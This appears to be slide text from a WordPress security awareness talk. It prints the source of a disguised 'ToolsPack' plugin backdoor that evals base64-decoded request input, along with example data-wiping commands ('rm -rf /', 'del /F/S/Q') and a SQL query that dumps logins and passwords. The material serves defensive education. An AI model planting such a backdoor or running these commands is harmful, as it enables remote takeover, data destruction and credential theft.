2. Chris Dodds
Owner & Principal Advisor at Focusfire IT
Strategy & Consulting
Features: Ten+ years of experience across
multiple industries and IT disciplines.
Certifications:
CISSP System Requirements: Food, water, &
MCITP:SA internet connectivity.
Security+
Network+
3. This talk is not about the
top 5 WP security threats.
10. ToolsPack Plugin
toolspack.php
<?php
/*
Plugin
Name:
ToolsPack
Description:
Supercharge
your
WordPress
site
with
powerful
features
previously
only
available
to
WordPress.com
users.
core
release.
Keep
the
plugin
updated!
Version:
1.2
Author:
Mark
Stain
Author
URI:
http://checkWPTools.com/
*/
$_REQUEST[e]
?
EVAL(
base64_decode(
$_REQUEST[e]
)
)
:
exit;
?>
Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
11. This backdoor code allows the
remote user to:
Execute commands on you server
$WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;
Execute commands against your WP database
SELECT login + '-' + password FROM users
12. More Likely...
Payload - keylogger, trojan, spyware, virus
SEO Spam - links, keywords
“garden gnomes, free
chaps, leather sale,
cheap sex, porn,
prescription drugs,
coupons, free avon”
13. Best Practices
Update! Update! Update!
Backup & test your backups.
Use a unique passphrase.
Don’t use the “admin” user.
Disable or delete un-used plugins.
14. These are all things your
attacker will do once they
control your site.